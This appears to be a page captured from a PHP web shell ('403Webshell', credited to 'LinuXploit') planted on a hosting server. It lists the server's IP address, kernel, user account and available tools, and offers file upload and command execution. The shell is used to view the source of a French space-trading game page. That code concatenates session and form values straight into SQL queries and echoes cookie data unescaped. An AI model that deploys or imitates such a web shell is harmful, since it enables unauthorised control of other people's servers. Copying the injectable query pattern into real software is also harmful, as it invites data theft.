403Webshell
Server IP : 109.234.162.214  /  Your IP : 216.73.216.222
Web Server : Apache
System : Linux servd162214.srv.odns.fr 4.18.0-372.26.1.lve.1.el8.x86_64 #1 SMP Fri Sep 16 14:08:19 EDT 2022 x86_64
User : carpe ( 1178)
PHP Version : 8.0.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/carpe/public_html/starship/tests/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/carpe/public_html/starship/tests/cookies.php
<?php

session_start();

include '../objet.php';
        include '../database.php';
        
        $database = new Database();
        $connexion = $database->getConnection();

function newCookie($erreur){
    $nom = "resultat2";
    $valeur = $erreur;
    $expire = time() + (30 * 24 * 60 * 60);
    
    setcookie($nom, $valeur, $expire, "/");
}

if(isset($_COOKIE['resultat2'])){
    echo "<div class='result'>";
    //echo $_COOKIE['resultat2'];
    echo "</div>";
    setcookie("resultat2", "", time() - 3600, "/");
    $text = $_COOKIE['resultat2'];
}



echo "<form method='POST' action='cookies.php'>
<input type='submit' name='send'></form>";

if(isset($_POST['send'])){
    $erreur = "hola";
    newCookie($erreur);
    header("Location: cookies.php");
    
}

if(isset($_POST['recruter'])){
    $erreur = "hola";
    newCookie($erreur);
    header("Location: cookies.php");
}



?>
<!DOCTYPE html>
<html>
<head>
    <title>Watching Us</title>
    <meta charset="utf-8">
</head>
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Nabla&family=Quicksand:wght@300..700&family=VT323&display=swap" rel="stylesheet">
<style>

    body{
        background:black;
        width:100%;
        height:100vh;
        display:flex;
        justify-content:center;
        align-items:center;
        padding:0;
        margin:0;
        color:white;
    }
    
    #contain{
        width:800px;
        height:500px;
        background:#F2F2F2;
        background:black;
        display:flex;
        justify-content:center;
        align-items:center;
        border: 5px solid #d0c2c2;
        position:relative;
  
        
    }
    
    #menu{
        position:absolute;
        top:0;
    }
    

    
    #menu input{
        all:initial;
        
        font-family: "VT323", monospace;
        font-size:1.5rem;
        padding: 5px 10px 5px 10px;
        border : 5px solid #d0c2c2;
        padding:5px 10px 5px 10px;
        cursor:pointer;
        transition:.5s all;
        
        
        color:black;
        background:#d0c2c2;
    }
    
    #menu input:hover{
        transform:.5s all;
        background:black;
        color:#d0c2c2;
    }
    
    #background_gestion{
        width:100%;
        height:100%;
        background-image:url('images/bg_marche.png');
        background-size:cover;
        
    }
    
    #text{
        position:absolute;
        color:#d0c2c2;
        top:-40px;
        font-family: "VT323", monospace;
        font-size:1.3rem;
    }

    
    #deco input{
        position:absolute;
        color:black;
        background:#d0c2c2;
        font-family: "VT323", monospace;
        font-size:1.5rem;
        top:0;
        left:0;
        z-index:999;
        outline:none;
        cursor:pointer;
        border:none;
        transition: .5s all;
        border : 5px solid #d0c2c2;
    }
    
    #deco input:hover{
        color:#d0c2c2;
        background:black;
        transition: .5s all;
        
    }
    
    #reponse{
        position:absolute;
        bottom:-70px;
        display:flex;
    }
    #reponse input{
        color:black;
        background:#d0c2c2;
        font-family: "VT323", monospace;
        font-size:1.5rem;
        outline:none;
        cursor:pointer;
        border:none;
        transition: .5s all;
        border : 5px solid #d0c2c2;
        margin:10px;
    }
    
    #reponse input:hover{
        color:#d0c2c2;
        background:black;
        transition: .5s all;
        
    }
    #reponse button{
        color:black;
        margin:10px;
        background:#d0c2c2;
        font-family: "VT323", monospace;
        font-size:1.5rem;
        outline:none;
        cursor:pointer;
        border:none;
        transition: .5s all;
        border : 5px solid #d0c2c2;
    }
    
    #reponse button:hover{
        color:#d0c2c2;
        background:black;
        transition: .5s all;
        
    }
    .text{
        position:absolute;
        bottom:0;
        border: 5px solid #d0c2c2;
        height:7vh;
        padding:10px;
        width:400px;
        background:black;
    }
    
    .perso{
        position:absolute;
        bottom:85px;
        width:300px;
    }
    
    .result{
        position:absolute;
        bottom:-100px;
    }


    
    
    
</style>
<body>
    <form id='deco' method='POST' action='cookies.php'>
        <input type='submit' name='deco' value='Deconnexion'>
    </form>
    <div id='contain'>
        <div id='menu'>
                    <form method='POST' action='cookies.php'>
                    <input type='submit' name='marche' value='Marché'>
                    <input type='submit' name='gestion' value='Gestion'>
                    <input type='submit' name='vaisseaux' value='Vaisseaux'>
                    </form>
        </div>
        <?php
        
        if(isset($_POST['vendre']) OR isset($_POST['recruter'])){
            //header("Location: cookies.php");
        }
        
        if(isset($_POST['deco'])){
            session_destroy();
            header("Location: login.php");
            setcookie("resultat", "", time() - 3600, "/");
        }
        
        if(isset($_SESSION['login'])){
            
        }else{
            header("Location: login.php");
            setcookie("resultat", "", time() - 3600, "/");
        }
        
        if(isset($_POST['gestion'])){
            echo "<div id='text'>Vous vous trouvez dans votre refuge, vous pouvez gérer vos membres</div>";
        }else if(isset($_POST['vaisseaux'])){
            echo "<div id='text'>Vous vous trouvez dans votre garage, vous pouvez gérer vos vaisseaux</div>";
        }else{
            echo "<div id='text'>Vous vous trouvez au marché, vous pouvez discuter et recruter de nouveaux membres</div>";
        }
        
        if(isset($_POST['gestion'])){
            echo "<div id='background_gestion'></div>";
        }else if(isset($_POST['vaisseaux'])){
            
        }else{
            echo "<div id='background_marche'></div>";
            
            $id = getId($connexion);
            $sql = "SELECT * from persos where id_user = '$id'";
            $statement = $connexion->prepare($sql);
            $statement->execute();
            $results = $statement->fetchAll(PDO::FETCH_ASSOC);
            foreach($results as $row){
                $nom = $row['nom'];
                $prenom = $row['prenom'];
                $nom1 = $prenom . " " . $nom;
                foreach($personnes as $value){
                    $nom2 = $value->getNom();
                    if($nom1 == $nom2){
                        
                        echo "<img class='perso' src='../images/perso.png'>";
                        $nom = $value->getNom();
                        if ($value instanceof Operateur) {
                            echo "<div class='text'>";
                            echo $value->getNom();
                            echo " : Bonjour, Je voudrais du pain";
                            echo "</div>";
                        } elseif ($value instanceof Mentaliste) {
                            echo "<div class='text'>";
                            echo $value->getNom();
                            echo " : Bonjour, Je vais vous prendre des rations";
                            echo "</div>";
                        }
                        echo "<div id='reponse'><form method='POST' action='cookies.php'><input type='hidden' name='nom' value='$nom'><input type='submit' name='recruter' value='Recruter'><input type='submit' name='vendre' value='Vendre les produits'></form>
                        <button id='infos'>Informations</button></div>";
                        
                    }
                }
            }
            if (empty($results)) {
                echo "Vous n'aurez plus de clients aujourd'hui.";
            }
            
            
            
            /**
            shuffle($personnes);
            $elementsAleatoires = array_slice($personnes, 0, 5);
            
            $id = getId($connexion);
            $sql = "SELECT * from team where id_user='$id'";
            $statement = $connexion->prepare($sql);
            $statement->execute();
            $results = $statement->fetchAll(PDO::FETCH_ASSOC);
            
            $sql2 = "SELECT * from dejavu where id_user='$id'";
            $statement2 = $connexion->prepare($sql2);
            $statement2->execute();
            $results2 = $statement2->fetchAll(PDO::FETCH_ASSOC);
            
            foreach($elementsAleatoires as $value){
                echo 'HEY';
                $nom = $value->getJustNom();
                
                $teamNoms = array_column($results, 'nom');
                $dejavuNoms = array_column($results2, 'nom');

                
                if (!in_array($nom, $teamNoms) && !in_array($nom, $dejavuNoms)){
                    echo "<img class='perso' src='images/perso.png'>";
                        $nom = $value->getNom();
                        if ($value instanceof Operateur) {
                            echo "<div class='text'>";
                            echo $value->getNom();
                            echo " : Bonjour, Je voudrais du pain";
                            echo "</div>";
                        } elseif ($value instanceof Mentaliste) {
                            echo "<div class='text'>";
                            echo $value->getNom();
                            echo " : Bonjour, Je vais vous prendre des rations";
                            echo "</div>";
                        }
                        echo "<div id='reponse'><form method='POST' action='univers.php'><input type='hidden' name='nom' value='$nom'><input type='submit' name='recruter' value='Recruter'><input type='submit' name='vendre' value='Vendre les produits'></form>
                        <button id='infos'>Informations</button></div>";
                }else{
                    echo "Vous n'aurez plus de clients aujourd'hui.";
                }
            }
            **/

        }
        
        if(isset($_POST['vendre'])){
            $nom = $_POST['nom'];
            foreach($personnes as $value){
                $nom2 = $value->getNom();
                if($nom2 == $nom){
                    $tab = $value->toArray();
                    $nom = $tab['nom'];
                    $prenom = $tab['prenom'];
                    
                    $id = getId($connexion);
                    
                    $sql = "DELETE FROM `persos` WHERE id_user='$id' and nom='$nom' and prenom ='$prenom'";
                    $statement = $connexion->prepare($sql);
                    $statement->execute();
  
                }
            }
        }
        
        
        
        
        
        if(isset($text)){
            echo "ohASAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
            echo $text;
        }
        
        function getId($connexion){
            $username = $_SESSION['login'];
            $sql = "SELECT id_user from users where username = '$username'";
            $statement = $connexion->prepare($sql);
            $statement->execute();
            $results = $statement->fetchAll(PDO::FETCH_ASSOC);
            foreach ($results as $row) {
                $id = $row['id_user'];
                return $id;
            }
        }
        
        ?>
        
</div>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit